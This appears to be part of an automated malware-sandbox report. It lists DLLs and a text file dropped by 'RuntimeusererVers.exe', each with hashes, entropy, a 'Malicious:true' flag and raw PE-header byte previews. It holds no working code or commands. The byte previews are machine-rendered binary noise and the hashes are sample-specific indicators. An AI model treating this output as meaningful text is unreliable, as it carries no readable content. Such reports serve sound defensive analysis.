                                                                                                                                                                                                                                        Size (bytes):181760
                                                                                                                                                                                                                                        Entropy (8bit):6.176962076839488
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
                                                                                                                                                                                                                                        MD5:FDE9A1D6590026A13E81712CD2F23522
                                                                                                                                                                                                                                        SHA1:CA99A48CAEA0DBACCF4485AFD959581F014277ED
                                                                                                                                                                                                                                        SHA-256:16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
                                                                                                                                                                                                                                        SHA-512:A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......._......C...C...C..NC...CI..B...C}. C...CI..B...CI..B...CI..B...C..B...Cz..B...C...C...C..B...C..HC...C..B...C."C...C..B...CRich...C........................PE..d...m.b.........." .........B..............................................0............`..........................................g..l....g..................<............ .......M...............................M..8............................................text...x........................... ..`.rdata..............................@..@.data....\.......0...x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):123664
                                                                                                                                                                                                                                        Entropy (8bit):6.058417150946148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:c7u5LnIx1If3yJdqfLI2AYX5BO89IPLPPUxdF:cwxfijqfLI29BO8VF
                                                                                                                                                                                                                                        MD5:BD36F7D64660D120C6FB98C8F536D369
                                                                                                                                                                                                                                        SHA1:6829C9CE6091CB2B085EB3D5469337AC4782F927
                                                                                                                                                                                                                                        SHA-256:EE543453AC1A2B9B52E80DC66207D3767012CA24CE2B44206804767F37443902
                                                                                                                                                                                                                                        SHA-512:BD15F6D4492DDBC89FCBADBA07FC10AA6698B13030DD301340B5F1B02B74191FAF9B3DCF66B72ECF96084656084B531034EA5CADC1DD333EF64AFB69A1D1FD56
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........G...&...&...&...^...&...Z...&...Z...&...Z...&...Z...&..$Z...&...^...&...^...&..-Z...&...&...&..$Z...&..$Z...&..$Zv..&..$Z...&..Rich.&..........................PE..d...!..d.........." ..."............p\..............................................|o....`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):253200
                                                                                                                                                                                                                                        Entropy (8bit):6.559097478184273
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:7t9gXW32tb0yf6CgLp+E4YECs5wxvj9qWM53pLW1Apw9tBg2YAp:7ngXW3wgyCiE4texvGI4Ap
                                                                                                                                                                                                                                        MD5:65B4AB77D6C6231C145D3E20E7073F51
                                                                                                                                                                                                                                        SHA1:23D5CE68ED6AA8EAABE3366D2DD04E89D248328E
                                                                                                                                                                                                                                        SHA-256:93EB9D1859EDCA1C29594491863BF3D72AF70B9A4240E0D9DD171F668F4F8614
                                                                                                                                                                                                                                        SHA-512:28023446E5AC90E9E618673C879CA46F598A62FBB9E69EF925DB334AD9CB1544916CAF81E2ECDC26B75964DCEDBA4AD4DE1BA2C42FB838D0DF504D963FCF17EE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nyR.............w.......s.......s.......s.......s.......s.......w.........._....s.......s.......s.......s.......s......Rich............PE..d......d.........." ...".v...<......L...............................................Rn....`..........................................T..P...`T...................&......./......P.......T...........................P...@............................................text....u.......v.................. ..`.rdata..<............z..............@..@.data....*...p...$...R..............@....pdata...&.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.222786912280051
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6TO+CPN/pV8ETeERZX/fchw/IpBIPOIVQ7SygPx:mClZZow/IpBIPOIVQyx
                                                                                                                                                                                                                                        MD5:4255C44DC64F11F32C961BF275AAB3A2
                                                                                                                                                                                                                                        SHA1:C1631B2821A7E8A1783ECFE9A14DB453BE54C30A
                                                                                                                                                                                                                                        SHA-256:E557873D5AD59FD6BD29D0F801AD0651DBB8D9AC21545DEFE508089E92A15E29
                                                                                                                                                                                                                                        SHA-512:7D3A306755A123B246F31994CD812E7922943CDBBC9DB5A6E4D3372EA434A635FFD3945B5D2046DE669E7983EF2845BD007A441D09CFE05CF346523C12BDAD52
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.u.'.&.'.&.'.&._,&.'.&.[.'.'.&.[.'.'.&.[.'.'.&.[.'.'.&._.'.'.&*[.'.'.&.'.&e'.&*[.'.'.&*[.'.'.&*[@&.'.&*[.'.'.&Rich.'.&........PE..d......d.........." ...".T...~......`?...............................................%....`.............................................P.......................,......../......\...0}..T............................{..@............p..(............................text...uR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):158992
                                                                                                                                                                                                                                        Entropy (8bit):6.8491146526380025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:A4lirS97HrdVmEkGCm5hAznf49mNo2NOvJ02pIPZ1wBExN:VlirG0EkTVAYO2NQ3w
                                                                                                                                                                                                                                        MD5:E5ABC3A72996F8FDE0BCF709E6577D9D
                                                                                                                                                                                                                                        SHA1:15770BDCD06E171F0B868C803B8CF33A8581EDD3
                                                                                                                                                                                                                                        SHA-256:1796038480754A680F33A4E37C8B5673CC86C49281A287DC0C5CAE984D0CB4BB
                                                                                                                                                                                                                                        SHA-512:B347474DC071F2857E1E16965B43DB6518E35915B8168BDEFF1EAD4DFF710A1CC9F04CA0CED23A6DE40D717EEA375EEDB0BF3714DAF35DE6A77F071DB33DFAE6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*...D,..D,..D,...,..D,..E-..D,..A-..D,..@-..D,..G-..D,M.E-..D,..E-..D,..E,.D,M.I-..D,M.D-..D,M.,..D,M.F-..D,Rich..D,........PE..d...$..d.........." ...".b...........5....................................................`..........................................%..L...\%..x....p.......P.......>.../......8.......T...........................p...@............................................text....a.......b.................. ..`.rdata..............f..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........p.......2..............@..@.reloc..8............<..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34584
                                                                                                                                                                                                                                        Entropy (8bit):6.4080285175428715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:aHI6RwgJ5xe3Sc88GnJ8xIPWtpu5YiSyvDIqPxWEu:CIoJ5U3Sc88GJ8xIPWtpE7SyMqPx
                                                                                                                                                                                                                                        MD5:827439C35A0CEE0DE6421AF039CA7FF9
                                                                                                                                                                                                                                        SHA1:E7FDC4624C3D4380E527EE6997D4EBDEEC353EEA
                                                                                                                                                                                                                                        SHA-256:B86E19E57A415AE9D65D4C0A86658DE2D2AD6A97617CB514A105449C9B679D89
                                                                                                                                                                                                                                        SHA-512:92F2344253ECCF24CAFDA8F5559E2FA4C21D5B0889540139278032491596EC0AC743B18D4074AE12CB15060EDFED14B243A37B23434E7B2F15998FADDA3D15F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z*j.4yj.4yj.4yc..yh.4y%.5xh.4y%.1xg.4y%.0xb.4y%.7xi.4y..5xh.4yj.5y3.4y!.5xo.4y..9xh.4y..4xk.4y...yk.4y..6xk.4yRichj.4y........................PE..d......d.........." ...".....<......0...............................................Y.....`.........................................0D..`....D..x....p.......`.......X.../...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50968
                                                                                                                                                                                                                                        Entropy (8bit):6.432736275046285
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:gwFMCcP4W1vqJiR5RMWlpX4Ju6r2VIPXtz5YiSyvbPxWEuw:ZFMiJifKJulVIPXt97SyjPx9
                                                                                                                                                                                                                                        MD5:E5ACEAF21E82253E300C0B78793887A8
                                                                                                                                                                                                                                        SHA1:C58F78FBBE8713CB00CCDFEB1D8D7359F58EBFDE
                                                                                                                                                                                                                                        SHA-256:D950342686C959056FF43C9E5127554760FA20669D97166927DD6AAE5494E02A
                                                                                                                                                                                                                                        SHA-512:517C29928D6623CF3B2BCDCD68551070D2894874893C0D115A0172D749B6FE102AF6261C0FD1B65664F742FA96ABBCE2F8111A72E1A3C2F574B58B909205937F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........){.G(.G(.G(...(.G(..F).G(..B).G(..C).G(..D).G(..F).G(.F(..G(..F).G(..C).G(..J).G(..G).G(..(.G(..E).G(Rich.G(........................PE..d......d.........." ...".B...X............................................................`.........................................0...X................................/......,....f..T...........................Pe..@............`...............................text...^A.......B.................. ..`.rdata..$5...`...6...F..............@..@.data................|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32528
                                                                                                                                                                                                                                        Entropy (8bit):6.448063770045404
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:AuCvO+MZFryl9SDCP6rXv+mkWsniRq9IPQUkHQIYiSy1pCQqIPxh8E9VF0NykOBw:1+yF+6rX2mk599IPQUO5YiSyv3PxWEun
                                                                                                                                                                                                                                        MD5:F00133F7758627A15F2D98C034CF1657
                                                                                                                                                                                                                                        SHA1:2F5F54EDA4634052F5BE24C560154AF6647EEE05
                                                                                                                                                                                                                                        SHA-256:35609869EDC57D806925EC52CCA9BC5A035E30D5F40549647D4DA6D7983F8659
                                                                                                                                                                                                                                        SHA-512:1C77DD811D2184BEEDF3C553C3F4DA2144B75C6518543F98C630C59CD597FCBF6FD22CFBB0A7B9EA2FDB7983FF69D0D99E8201F4E84A0629BC5733AA09FFC201
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_X..1...1...1.......1...0...1...4...1...5...1...2...1.~.0...1...0...1...0...1.~.<...1.~.1...1.~.....1.~.3...1.Rich..1.........PE..d......d.........." ...".....8......................................................./....`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79640
                                                                                                                                                                                                                                        Entropy (8bit):6.290841920161528
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:0JltpedXL+3ujz9/s+S+pzpMoiyivViaE9IPLwj7SyZPx:07tp4i3ujz9/sT+pzqoavVpE9IPLwjHx
                                                                                                                                                                                                                                        MD5:1EEA9568D6FDEF29B9963783827F5867
                                                                                                                                                                                                                                        SHA1:A17760365094966220661AD87E57EFE09CD85B84
                                                                                                                                                                                                                                        SHA-256:74181072392A3727049EA3681FE9E59516373809CED53E08F6DA7C496B76E117
                                                                                                                                                                                                                                        SHA-512:D9443B70FCDC4D0EA1CB93A88325012D3F99DB88C36393A7DED6D04F590E582F7F1640D8B153FE3C5342FA93802A8374F03F6CD37DD40CDBB5ADE2E07FAD1E09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RXY..97..97..97..A...97.YE6..97.YE2..97.YE3..97.YE4..97..E6..97..96..97.]A6..97..E:..97..E7..97..E...97..E5..97.Rich.97.................PE..d... ..d.........." ...".l...........%.......................................P......V.....`.............................................P............0....... ..x......../...@..........T...............................@............................................text...:k.......l.................. ..`.rdata...t.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):120080
                                                                                                                                                                                                                                        Entropy (8bit):6.255942152365855
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:eZ1UnKJVckfKr0in6CL1F4TSlNdtAhfw5ymJSoEQ6MV4KUq8BIPOQXxxp:ecnoVckfjab5kQ6FPC
                                                                                                                                                                                                                                        MD5:D7B9ED5F37519B68750ECB5DEFB8E957
                                                                                                                                                                                                                                        SHA1:661CF73707E02D2837F914ADC149B61A120DDA7D
                                                                                                                                                                                                                                        SHA-256:2CE63E16DF518AE178DE0940505FF1B11DA97A5B175FE2A0D355B2EE351C55FD
                                                                                                                                                                                                                                        SHA-512:F04708C28FEB54F355D977E462245B183A0B50F4DB6926C767E8F1499E83E910B05A3023B84D398FB5DD87743FE6146DBBC3E1CAAED5351C27396F16746C6D6B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................n.....M.......M.......M.......M.......M...............I..............................................Rich....................PE..d...%..d.........." ..."............`...............................................T.....`..........................................Z..P....Z.........................../..............T...............................@............................................text............................... ..`.rdata..l...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):161040
                                                                                                                                                                                                                                        Entropy (8bit):6.029728458381984
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:LMaGbIQQbN9W3PiNGeA66l8rBk3xA87xfCA+nbUtFMsVjTNbEzc+pIPC7ODxd:LMaG0bN96oG1l8YA8ZMSR+E
                                                                                                                                                                                                                                        MD5:208B0108172E59542260934A2E7CFA85
                                                                                                                                                                                                                                        SHA1:1D7FFB1B1754B97448EB41E686C0C79194D2AB3A
                                                                                                                                                                                                                                        SHA-256:5160500474EC95D4F3AF7E467CC70CB37BEC1D12545F0299AAB6D69CEA106C69
                                                                                                                                                                                                                                        SHA-512:41ABF6DEAB0F6C048967CA6060C337067F9F8125529925971BE86681EC0D3592C72B9CC85DD8BDEE5DD3E4E69E3BB629710D2D641078D5618B4F55B8A60CC69D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p...p...p....8..p.......p.......p.......p.......p..N....p...p...q.......p..N....p..N....p..N.T..p..N....p..Rich.p..........................PE..d...'..d.........." ..."............l+..............................................NS....`.............................................d...t........`.......P.......F.../...p..8...0...T...............................@............................................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..8....p.......8..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25360
                                                                                                                                                                                                                                        Entropy (8bit):6.6307231018245325
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:SR9ZfwFpEWE6ivQpIPZwGjHQIYiSy1pCQKzmPxh8E9VF0NyptVQcM:SRvqpEM4QpIPZw65YiSyvamPxWE3PS
                                                                                                                                                                                                                                        MD5:46E9D7B5D9668C9DB5CAA48782CA71BA
                                                                                                                                                                                                                                        SHA1:6BBC83A542053991B57F431DD377940418848131
                                                                                                                                                                                                                                        SHA-256:F6063622C0A0A34468679413D1B18D1F3BE67E747696AB972361FAED4B8D6735
                                                                                                                                                                                                                                        SHA-512:C5B171EBDB51B1755281C3180B30E88796DB8AA96073489613DAB96B6959A205846711187266A0BA30782102CE14FBFA4D9F413A2C018494597600482329EBF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h%p..K#..K#..K#.q.#..K#.uJ"..K#.uN"..K#.uO"..K#.uH"..K#.uJ"..K#.qJ"..K#..J#..K#.uC"..K#.uK"..K#.u.#..K#.uI"..K#Rich..K#................PE..d......d.........." ...".....&...... ........................................p.......p....`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...h........................... ..`.rdata....... ......................@..@.data........0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37888
                                                                                                                                                                                                                                        Entropy (8bit):5.536883608844324
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wQm5druFG/nDOnnvM7+gu305jTbEsU4qtp3/G0mTtAeSUhCE3umLUn0qQlwwHQoY:W58OSE7Gs+D/xmTllQFqLgM6/0
                                                                                                                                                                                                                                        MD5:4B5DCC46170E4AC810A59CA5B7533462
                                                                                                                                                                                                                                        SHA1:1EACF60FDFD427909B54F83518612A4638930225
                                                                                                                                                                                                                                        SHA-256:704CDCFCA773AC658B8F84335F29630707C216F739F7FA5970B1BE57F13A5B82
                                                                                                                                                                                                                                        SHA-512:C2E5B9B40F267F375234BE9A562882FAA1A0E82F32A951233464D27879D0B1620099BB800DE3E96BE277BB3BB44FF421A98A2F0C125F28652C2B6415D0FB4DEA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........IT..'...'...'.......'...&...'...&...'..."...'...#...'...$...'.;.&...'...&.".'.w./...'.w.'...'.w.....'.w.%...'.Rich..'.........PE..d....).c.........." ...".P...H.......R....................................................`..........................................z..`....{..d...............8....................r...............................q..@............`...............................text...(N.......P.................. ..`.rdata..L*...`...,...T..............@..@.data...............................@....pdata..8...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):207872
                                                                                                                                                                                                                                        Entropy (8bit):6.104353771977755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Q1Krrzce1C8X3N/2AZXIQ+FvcSpOXelJfNgDdZgFqrrP:nrzxjXRhAQehgDdiFGr
                                                                                                                                                                                                                                        MD5:A7B4711C5BA1866745485ABE14101AC7
                                                                                                                                                                                                                                        SHA1:C37158CBD0FE67F8ACD61596F63CF62BD2985431
                                                                                                                                                                                                                                        SHA-256:6688F3DD5B7EFA8008C5BA776F32CECF5B42887B1B9EE21555AE3E0D4F13D2E0
                                                                                                                                                                                                                                        SHA-512:F952AD3C21B649E13E64540713A61DB6D49B394CA5D62ADD7A5FEC2186A8D27131BA038D449561B77670D3DEB2358A8254E4E205EF20228E27B1EB8234D0E843
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~~...-...-...-.q.-...-.u.,...-.q.,...-Mr.,...-...-...-.u.,...-.u.,...-.u.,...-.u.,...-.u.,...-.u.-...-.u.,...-Rich...-........................PE..d....).c.........." ...".`..........Pc....................................................`.............................................h...X...d....p.......`..h......................................................@............p.. ............................text....^.......`.................. ..`.rdata...r...p...t...d..............@..@.data....e.......>..................@....pdata..h....`......................@..@.rsrc........p.......$..............@..@.reloc...............&..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34816
                                                                                                                                                                                                                                        Entropy (8bit):5.620393374613542
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zVFT6fGGeAoBw4L0Slb3KFHzZgnq/A5MnOty9+AetDHVsSWBDPMEYcAe9hNugNYU:zTG3hzuot+AAaLIEYclH+uLB3
                                                                                                                                                                                                                                        MD5:2F2A2B2343549E990419DF0977E3FAC9
                                                                                                                                                                                                                                        SHA1:5724B63E32BDA7D36285F79DC9AD57FC97BA5415
                                                                                                                                                                                                                                        SHA-256:9569B0B501A0235388D075BAA4C84E5D571169AC6CE3AE9220CDE31A5F208B94
                                                                                                                                                                                                                                        SHA-512:A1B99DCAF01666C3AB9755D55001F3A18344CD70C386CE1B2233B5C6B8248B59D95804B450F9EE9C2F51D6293C4E748B9347540AE3F247418A1673BBD6EF466A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........IZ..'...'...'.......'..&...'..&...'.."...'..#...'..$...'.+.&...'...&./.'.g./...'.g.'...'.g.....'.g.%...'.Rich..'.................PE..d....).c.........." ...".L...........O....................................................`..........................................x..h....x..d....................................p...............................o..@............`...............................text....J.......L.................. ..`.rdata..:'...`...(...P..............@..@.data....L...........x..............@....pdata...............~..............@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24064
                                                                                                                                                                                                                                        Entropy (8bit):5.3682936455537416
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:/NyocbRskh0rtT4vl8823C0/FCvNeu71vWRt7ARlgTeVycRguvNOM7:4ocd5hpdWCc3YoIIM7
                                                                                                                                                                                                                                        MD5:AA40AC7A7D1D9A10DA426701EA49508D
                                                                                                                                                                                                                                        SHA1:BBD083535E20EA00BCC40DE7B9E625FF5C74851E
                                                                                                                                                                                                                                        SHA-256:B892CBAF1A5B363FB66768194CD4D466916E81981BCB63C2989277114A4B0C10
                                                                                                                                                                                                                                        SHA-512:EAF14159F5F1B70DCB5E6416804F306EC5F4C235ABF431A27BC421861117BE8C6EC5326C8C703C4C3764B771E5DBAC37E6B93AC05F9A632BC83788C476EED8E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ID..'...'...'.......'..&...'..&...'.."...'..#...'..$...'.+.&...'...&...'.g./...'.g.'...'.g.....'.g.%...'.Rich..'.........................PE..d....).c.........." ...".,...4......./....................................................`......................................... S..d....S..d............p.......................L..............................`K..@............@..@............................text....*.......,.................. ..`.rdata..z....@... ...0..............@..@.data...8....`.......P..............@....pdata.......p.......V..............@..@.rsrc................Z..............@..@.reloc...............\..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):301568
                                                                                                                                                                                                                                        Entropy (8bit):6.375720417060108
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:GSL1oP995ooVABNirLq0l/IzkQ37P6BdeAb6:Gh19NO7irLq0l/IzB37Pe6
                                                                                                                                                                                                                                        MD5:03EF5E8DA65667751E1FD3FA0C182D3E
                                                                                                                                                                                                                                        SHA1:4608D1EFCA23143006C1338DEDA144A2F3BB8A16
                                                                                                                                                                                                                                        SHA-256:3D1C66BDCB4FA0B8E917895E1B4D62EE14260EAA1BD6FE908877C47585EC6127
                                                                                                                                                                                                                                        SHA-512:C094A3DFBD863726524C56DAB2592B3513A3A8C445BCAAC6CFB41A5DDEC3079D9B1F849C6826C1CC4241CA8B0AA44E33D2502BB20856313966AF31F480BA8811
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M.R.#GR.#GR.#G[..GT.#G."FP.#G.&FB.#G.'FU.#G. FQ.#G.."FP.#G."FQ.#GR."G=.#GR.#G..#G.#FS.#G.!FS.#GRichR.#G........................PE..d.....Bc.........." ...!.J...N.......*....................................................`..........................................o..T...Dp..................."......................T.......................(...p...@............`..p............................text...GI.......J.................. ..`.rdata.......`.......N..............@..@.data...x............l..............@....pdata...".......$...n..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):278952
                                                                                                                                                                                                                                        Entropy (8bit):6.049041164740881
                                                                                                                                                                                                                                        Encrypted:false
